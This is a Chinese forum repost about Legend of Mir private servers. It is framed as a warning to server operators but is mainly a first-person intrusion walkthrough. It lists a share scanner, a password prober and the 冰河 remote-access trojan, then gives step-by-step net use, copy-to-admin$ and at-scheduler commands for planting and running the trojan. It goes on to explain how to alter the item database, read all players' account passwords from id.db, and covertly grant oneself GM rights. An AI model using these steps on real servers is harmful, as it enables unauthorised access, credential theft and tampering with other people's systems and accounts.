对于传奇SF的安全，站长也是菜鸟，站长能做无法就是架设传奇服务端，用传奇登录器进去测试这个传奇，其他的也没有什么好教你们的，今天又找了一篇和传奇安全有关的文章，是常见入侵传奇的工具和一些简单的方法，希望真正开传奇的认真看看。会对你们有帮助的。

一些SF为什么存在非法GM的真正原因~ 在这里把它发出来，希望各位GM严加防范下面是怎么做非法GM而不在GM文件里表现出来，也不是什么后门的问题，请看转帖，希望大家严加防范如何在别人的SF做GM****攻击初级教学 我在侵入别人4f所使用的方法看到有些SF做的不错，但是进去又不是很有钱，也没装备，高手也很多，一直不喜欢在里面当菜鸟的我，一口气进入他们的服务器端大闹一番之后。当足了gm的瘾，现在我把方法公布与大家。。。。

其实我所使用的方法很简单，只有４个工具：

（一）：shed.exe

（二）流光2000

（三）cmd.exe (其实就是２０００下的dos啦)！

（四）冰河8.4 操作系统：win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的，速度快，可以查到很多服务断的共项文件，不过在这里面有些ｉｐ在浏览器中无法访问，这是因为其中也 包含了个人上网的ｉｐ．呵呵！一些作网站，网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，所以权限不 够！有些需要密码。遇到密码怎办？用流光！ “流光”虽说对202作了限制，但是对小日本的ip可是没有限制的，呵呵！所以说使用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测， 此时有些网管懒惰，把administrator设置的过于简单，呵呵，你就可以抓到了。

下一步如何做呢？也许在你查对方的端口时发现对方开的端口很少，比如ftp没开，怎办呢？冰河！ “冰河”，想必许多朋友都玩过，使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何并且控制 他呢？ “cmd.exe” 是２０００下的ｄｏｓ了，执行cmd.exe 使用net命令，

具体操作如下：

第一步：net use \ip\ipc$　“password” /user:”user” 说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必须是该网站admin里的。这里的”ip”就是主机了，“password”就是超级用户 的密码，“user”就是超级用户。比如：net use 0.248.250.2\ipc$ “maozhiie” /user:maozhijie

第二步：copy g-server.exe \ip\admin$\system32 说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对 方那边可以察觉出来的吧，呵呵！装了防火墙估计可以，不过很多主机没钱买呀！不像中国盗版满天飞！如果你有最新的木马也可以的！这是最好的了！！嘿嘿……

第三步：net time \ip 察看对方的服务器时间。由于有时差，应该是一个小时吧！所以必须要以对方的服务器时间为准。

第四步：at \ip time g-server.exe 这里的time就是对方的主机时间。作用：在规定时间执行该程序。比如　at 0.248.250.2 19:55 g-server.exe 第五步：冰河就可以控制该电脑了。这个我就不说了吧，呵呵！菜鸟也会玩的软件。

这时我们就可以控制服务器了，net use * \ip\*$ 远程映射，看这个mir.db里面有每个人的数据，并且没加密的，大家可以用
access找开来改一下，改几个极品，如0-80攻的木剑啊，0-50魔的六角戒指之类的，那就随你的便了。只是这样也太烦人了。呵呵。
比如武器,数据格式如下（全部是16进制）
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a 前面**的是物品代码，然后0xce 00 是武器代码(高位在后)，和物品db数据库中对应，例：物品数据库中屠龙是序号（idx）是205,对应到这里就是（205+1）转为16进制是ce 后面的 43 12是当前持久度，88 13是最大持久度。例：43 12换算成十进制为17170，持久度为17后面的01 02 03依次是攻击、魔法、道术。
注意是在原武基础上增加。

例：上面的屠龙显示出来是攻击：5-36，道术：0-2，魔法：0-3。后面的04 05 06 07 08 09依次是武器的 幸运、诅咒、准确、攻击速度、强度。后面两个空位后紧跟的0x0a是表示武器是否被修炼，具体来说给武器加攻击时：
修炼前：00
修炼后：0a
试验成功后：00，攻击值增加。对于首饰和衣服,自己研究吧，这有好多人都知道的吧,我没细写。网上这方面的文章是有的，我就不用多说了吧？然后到，|mirserver\mud2\logsrv\iddb下这里有个id.db所有人的帐号和密码都在了，你看着办吧，不过偷人家的号也不是什么光荣的事，我是从来不做的，只是常常会拿gm的号来reload一下。呵呵

这里，我把你边走边看加到这个服务器的adminlist，呵呵，这里是打个比方，这里加入你的名字）,然后，我们到mir.db中找出gm的帐 号，再到id.db中找出这个帐号的密码。好了，ok了，用gm号进入游戏（进之前m一下他啊，不要让人家发现了，也不要改人家的密码，让人家发现了多不 好啊，呵呵）。打命令@reloadadmin。立刻out吧。
然后，把你加入adminlist的人物从adminlist里删除，好了，你进去游戏吧，你是gm了，可是真正的gm是不会从服务器端看到你的名字 呢！！他也许在想“这里怎么了啊？好像还有个gm？？？”。呵呵，不过不要过火了，不然人家一个reload你的权限就没了啊。到这里大家做gm的梦就完成了。